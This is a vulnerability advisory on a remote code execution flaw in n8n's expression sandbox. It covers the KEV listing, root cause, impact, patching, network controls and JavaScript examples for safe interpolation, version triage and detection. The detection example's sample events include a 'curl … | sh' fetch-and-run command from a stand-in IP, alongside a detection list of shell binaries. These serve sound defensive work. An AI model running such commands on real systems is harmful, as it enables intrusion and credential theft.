Executive Summary
CVE-2025-68613 is a critical remote code execution vulnerability in n8n, the widely-deployed open-source workflow automation platform. The flaw exists in n8n's expression evaluation engine and stems from improper control of dynamically-managed code resources — allowing an attacker to escape the expression sandbox and execute arbitrary system commands on the n8n server.
CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on March 11, 2026, confirming active exploitation in the wild. Federal civilian executive branch agencies subject to Binding Operational Directive (BOD) 22-01 have until April 1, 2026 to remediate.
With over 24,700 n8n instances discoverable on the internet, the attack surface is substantial. Organizations using n8n for security automation, DevOps pipelines, and IT workflows are at high risk.
Minimum safe version: n8n 1.88.0
Vulnerability Details
| Attribute | Value |
|---|---|
| CVE ID | CVE-2025-68613 |
| CVSS Score | 9.9 (Critical) |
| CVSS Vector | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (CVSS v3; PR:L means a low-privileged user of the instance is sufficient) |
| CWE | CWE-913 — Improper Control of Dynamically-Managed Code Resources |
| Vendor | n8n GmbH |
| Product | n8n workflow automation platform |
| Affected Versions | n8n < 1.88.0 |
| Patch Version | n8n 1.88.0 |
| CISA KEV Added | March 11, 2026 |
| CISA Remediation Date | April 1, 2026 |
| Exploitation Status | Actively exploited in the wild |
Technical Analysis
Root Cause
n8n's expression evaluation system allows users to embed dynamic expressions within workflow nodes using {{ }} syntax. Internally, these expressions are executed via a JavaScript-based sandbox intended to restrict access to the host system.
The vulnerability arises from insufficient isolation of the expression evaluator: certain expression patterns can reference or construct JavaScript objects that escape the intended sandbox boundary, gaining access to Node.js runtime primitives. Once outside the sandbox, an attacker can invoke child_process.exec() or equivalent mechanisms to execute arbitrary operating system commands with the privileges of the n8n process.
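The root-cause discussion above comes down to one design point: text that is handed to a JavaScript engine inherits the engine's object model, and a sandbox built on top of that model is only as strong as its isolation from the host. As an added illustration (this is not n8n's evaluator, whose real implementation is far more capable), here is a minimal `{{ }}` interpolator that never executes the expression at all: it resolves the expression as an own-property path over the item data, so there is no object graph to escape from. The path grammar, helper names and sample item are constructed for this example.

```javascript
// Added illustration, not n8n code: an expression interpolator that treats
// "{{ ... }}" as a data path, never as JavaScript. Because no JS engine ever
// sees the user's text, Function, process and child_process are unreachable.

// Segments that are never legitimate data keys; rejecting them is defence in
// depth, since the own-property check below already stops prototype walks.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Constructed grammar: $json followed by dotted identifiers or numeric indices,
// e.g. "$json.user.name" or "$json.items.0". Anything else is rejected outright.
const PATH_RE = /^\$json(?:\.(?:[A-Za-z_][A-Za-z0-9_]*|\d+))+$/;

function resolvePath(data, expr) {
  const path = expr.trim();
  if (!PATH_RE.test(path)) {
    throw new Error(`rejected expression: ${path}`);
  }
  const segments = path.split('.').slice(1); // drop the leading $json
  let cur = data;
  for (const seg of segments) {
    if (FORBIDDEN_SEGMENTS.has(seg)) {
      throw new Error(`rejected segment: ${seg}`);
    }
    // Only own properties of plain objects/arrays are visible: inherited
    // members such as toString or constructor resolve to undefined.
    if (cur === null || typeof cur !== 'object' ||
        !Object.prototype.hasOwnProperty.call(cur, seg)) {
      return undefined;
    }
    cur = cur[seg];
  }
  return cur;
}

// Replace every {{ ... }} in a template with its resolved value.
function interpolate(template, data) {
  return template.replace(/\{\{([^}]*)\}\}/g, (_, expr) => {
    const v = resolvePath(data, expr);
    return v === undefined ? '' : String(v);
  });
}

// Constructed sample item, shaped like the data a workflow node receives.
const sampleItem = { user: { name: 'alice', roles: ['admin', 'ops'] }, id: 42 };

console.log(interpolate('Hello {{ $json.user.name }} #{{ $json.id }}', sampleItem));
```

The trade-off is deliberate: this resolver cannot call methods or do arithmetic, which is exactly why it has no sandbox to escape. Any evaluator that does need real expressions should run them out of process with the least privilege the workflow requires, rather than rely on in-process isolation.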
Attack Surface
n8n is particularly high-value as a target because:
- Webhook endpoints are often publicly exposed — many n8n deployments expose webhook triggers directly to the internet
- n8n stores credentials for connected services — API keys, database credentials, cloud tokens, Slack/GitHub integrations
- n8n processes frequently run with elevated privileges — to interact with infrastructure, Docker, or internal systems
- SOAR and security automation workflows give n8n access to SIEM, ticketing, and response tooling
Exploitation Scenario
1. Attacker identifies an n8n instance (Shodan/FOFA show 24,700+ exposed)
2. Attacker obtains the ability to submit an expression: PR:L in the CVSS vector means a low-privileged account that can create or edit a workflow is enough, and an instance whose editor is reachable without authentication needs no account at all
3. Attacker crafts an expression payload targeting the evaluator
4. Payload escapes the sandbox via dynamically-managed code resource abuse (CWE-913)
5. Arbitrary commands execute as the n8n process user
6. Attacker extracts credentials from n8n's credential store
7. Lateral movement to connected cloud/infrastructure targets
Why 24,700 Instances?
Shodan and similar internet scanning platforms showed over 24,700 n8n instances publicly reachable as of mid-March 2026. Many are self-hosted deployments by individuals, small teams, and enterprises, often without authentication or behind only basic HTTP auth. A CVSS 9.9 RCE combined with that level of exposure makes mass exploitation practical for motivated threat actors.
Impact Assessment
| Area | Risk |
|---|---|
| Remote Code Execution | Full command execution on the n8n host with process-level privileges |
| Credential Theft | All credentials stored in n8n's credential manager are at risk |
| Lateral Movement | n8n's integrations provide pivot points to cloud, SaaS, and internal systems |
| Data Exfiltration | Workflow data, API responses, and processed payloads accessible |
| Supply Chain Impact | Compromised n8n in CI/CD pipelines enables downstream attacks |
| SOAR Compromise | n8n-based security automation can be subverted or disabled |
Remediation
Immediate Actions
- Update to n8n 1.88.0 or later — this is the patched version that remediates CVE-2025-68613
- Identify exposed instances — audit all n8n deployments for internet-facing exposure
- Rotate all stored credentials — if running a vulnerable version, all credentials in n8n's store should be considered compromised
- Review recent workflow execution logs — look for unusual expressions or unexpected child process activity
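An added triage helper for the actions above (this is not n8n tooling): it compares inventory version strings against the 1.88.0 threshold this advisory gives and ranks instances so that vulnerable internet-facing ones are handled first. The `versionFromSettings` parser assumes the instance reports its version as `data.versionCli` in the JSON body of `/rest/settings`, which is the field n8n's front end reads; confirm that against your version before relying on it. The inventory records and sample settings JSON are constructed.

```javascript
// Added triage helper; not part of n8n. Versions below MIN_SAFE_VERSION are
// treated as vulnerable per the advisory above.
const MIN_SAFE_VERSION = '1.88.0';

// Parse "1.87.2" or "v1.88.0-rc.1" into numeric [major, minor, patch].
// Numeric comparison matters: "1.9.0" sorts after "1.88.0" lexicographically.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Negative if a < b, 0 if equal, positive if a > b.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

function isVulnerable(version) {
  return compareVersions(version, MIN_SAFE_VERSION) < 0;
}

// Assumption: GET /rest/settings on an n8n instance returns
// { data: { versionCli: "x.y.z", ... } }. Fetch it with curl or fetch() and
// pass the parsed JSON body here.
function versionFromSettings(settingsJson) {
  const v = settingsJson && settingsJson.data && settingsJson.data.versionCli;
  if (typeof v !== 'string') throw new Error('versionCli not found in settings response');
  return v;
}

// P1: vulnerable and internet-facing; P2: vulnerable but internal; P3: patched.
function triage(inventory) {
  return inventory
    .map((inst) => {
      const vulnerable = isVulnerable(inst.version);
      const priority = vulnerable ? (inst.internetFacing ? 'P1' : 'P2') : 'P3';
      return { host: inst.host, version: inst.version, vulnerable, priority };
    })
    .sort((a, b) => a.priority.localeCompare(b.priority));
}

// Constructed sample data.
const sampleSettings = { data: { versionCli: '1.87.2' } };
const inventory = [
  { host: 'n8n-prod.example.internal', version: versionFromSettings(sampleSettings), internetFacing: true },
  { host: 'n8n-dev.example.internal', version: '1.88.0', internetFacing: false },
  { host: 'n8n-soar.example.internal', version: '1.79.3', internetFacing: false },
];

console.table(triage(inventory));
```

Every P1 and P2 host also gets the credential rotation and log review from the list above; the patch alone does not undo a compromise that happened before it was applied.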
Network Controls
- Place n8n behind a VPN or zero-trust proxy — remove all direct internet exposure
- Restrict webhook access to known IP ranges or authenticated endpoints only
- Block outbound connections from n8n to unexpected destinations (egress filtering)
- Deploy a WAF in front of any externally-accessible n8n instance
Detection Guidance
Monitor for:
- Unusual process spawning from the n8n process (e.g., `bash`, `sh`, `cmd.exe` as child processes); note that n8n's Execute Command node spawns a shell by design, so baseline which workflows legitimately do this and alert on command lines that do not match them
- Outbound connections from n8n to external IPs outside normal integration targets
- File system access patterns outside standard n8n operation directories
- Credential access events in connected systems (AWS, GitHub, Slack) from unexpected sources
- New webhook trigger activations not matching established workflows
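An added example, not from the advisory, that turns the first two indicators above into code. The event shapes (a process-creation record carrying its `parent`, and a network-connection record carrying its `process`) are a constructed, generic EDR/auditd-style JSON; map your own telemetry's field names onto them. The egress allowlist and the sample events are example values.

```javascript
// Added detection example; field names and sample events are constructed.

const SHELLS = new Set(['bash', 'sh', 'dash', 'zsh', 'cmd.exe', 'powershell.exe', 'pwsh']);

// Example allowlist of this instance's legitimate integration targets.
const EXPECTED_EGRESS = new Set(['api.github.com', 'slack.com', 'hooks.slack.com']);

// Last path component, lower-cased, for both / and \ separators.
function baseName(path) {
  return String(path).split(/[\\/]/).pop().toLowerCase();
}

// The n8n process is a Node process whose command line references n8n.
function isN8nProcess(p) {
  return Boolean(p) && baseName(p.image) === 'node' && /\bn8n\b/.test(p.cmdline || '');
}

function analyzeEvent(ev) {
  if (ev.type === 'process_create' && isN8nProcess(ev.parent) && SHELLS.has(baseName(ev.image))) {
    return {
      severity: 'high',
      rule: 'n8n-shell-child',
      detail: `${baseName(ev.image)} spawned by n8n: ${ev.cmdline}`,
    };
  }
  if (ev.type === 'network_connect' && isN8nProcess(ev.process) && !EXPECTED_EGRESS.has(ev.dest_host)) {
    return {
      severity: 'medium',
      rule: 'n8n-unexpected-egress',
      detail: `outbound to ${ev.dest_host}:${ev.dest_port}`,
    };
  }
  return null;
}

function detect(events) {
  return events.map(analyzeEvent).filter(Boolean);
}

// Constructed sample telemetry: a normal integration call, a shell child,
// an odd egress, and a shell from an unrelated Node service.
const n8nProc = { image: '/usr/bin/node', cmdline: 'node /usr/local/bin/n8n start' };
const sampleEvents = [
  { type: 'network_connect', process: n8nProc, dest_host: 'api.github.com', dest_port: 443 },
  { type: 'process_create', parent: n8nProc, image: '/bin/sh',
    cmdline: 'sh -c "curl -s http://203.0.113.7/x | sh"' },
  { type: 'network_connect', process: n8nProc, dest_host: '203.0.113.7', dest_port: 80 },
  { type: 'process_create', parent: { image: '/usr/bin/node', cmdline: 'node /srv/app/server.js' },
    image: '/bin/sh', cmdline: 'sh -c ls' },
];

console.log(detect(sampleEvents));
```

The egress rule is only as good as its baseline: collect each instance's normal destinations (its configured integrations and webhook callbacks) before enabling it, or it will page on every new workflow. Matching on the parent's command line rather than on the process name alone keeps other Node services on the same host from triggering the shell rule.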
For Federal Agencies (CISA BOD 22-01)
Federal civilian executive branch agencies subject to Binding Operational Directive 22-01 must remediate by April 1, 2026. This covers any n8n installation in scope of the BOD, including self-hosted instances in agency cloud environments.
CISA KEV Entry
CISA added CVE-2025-68613 to the KEV catalog on March 11, 2026 under the following entry:
| Field | Value |
|---|---|
| Vendor/Project | n8n |
| Product | n8n |
| Vulnerability Name | n8n Improper Control of Dynamically-Managed Code Resources Vulnerability |
| Date Added | 2026-03-11 |
| Due Date | 2026-04-01 |
| Required Action | Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable |
| Known Ransomware Use | Unknown |
References
- CISA KEV — CVE-2025-68613
- NVD — CVE-2025-68613
- The Hacker News — CISA Flags Actively Exploited n8n RCE Bug
- BleepingComputer — CISA Orders Feds to Patch n8n RCE Flaw Exploited in Attacks